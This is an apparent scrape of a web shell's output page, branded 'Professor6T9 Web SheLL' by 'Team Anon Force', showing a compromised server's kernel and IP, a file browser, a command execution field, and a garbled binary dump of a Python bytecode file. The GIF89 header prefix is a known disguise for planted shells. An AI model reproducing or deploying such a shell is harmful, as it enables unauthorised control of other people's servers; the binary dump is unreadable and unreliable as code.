GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host71.registrar-servers.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Apache
199.188.205.61
/
opt
/
hc_python
/
lib64
/
python3.12
/
site-packages
/
sentry_sdk
/
integrations
/
__pycache__
[ HOME ]
Exec
Submit
threading.cpython-312.pyc
� o0i� � �" � d dl Z d dlZd dlmZ d dlmZmZ d dlmZm Z d dl Z d dlmZ d dl mZmZ d dlmZmZmZmZ d dlmZ er7d d lmZ d d lmZ d dlmZ d dlmZ d d lmZ ededef �� Z ede�� Z G d� de� Zd� Z d� Z!d� Z"y)� N��wraps)�Thread�current_thread)�ThreadPoolExecutor�Future)�Integration��use_isolation_scope� use_scope)�event_from_exception�capture_internal_exceptions�logger�reraise)� TYPE_CHECKING)�Any)�TypeVar)�Callable)�Optional)�ExcInfo�F.)�bound�Tc �( � e Zd ZdZdd�Zed� � Zy)�ThreadingIntegration� threadingNc �T � |�t j d� || _ |�|| _ y y )NzLDeprecated: propagate_hub is deprecated. This will be removed in the future.)r �warning�propagate_scope)�self� propagate_hubr s �P/opt/hc_python/lib/python3.12/site-packages/sentry_sdk/integrations/threading.py�__init__zThreadingIntegration.__init__"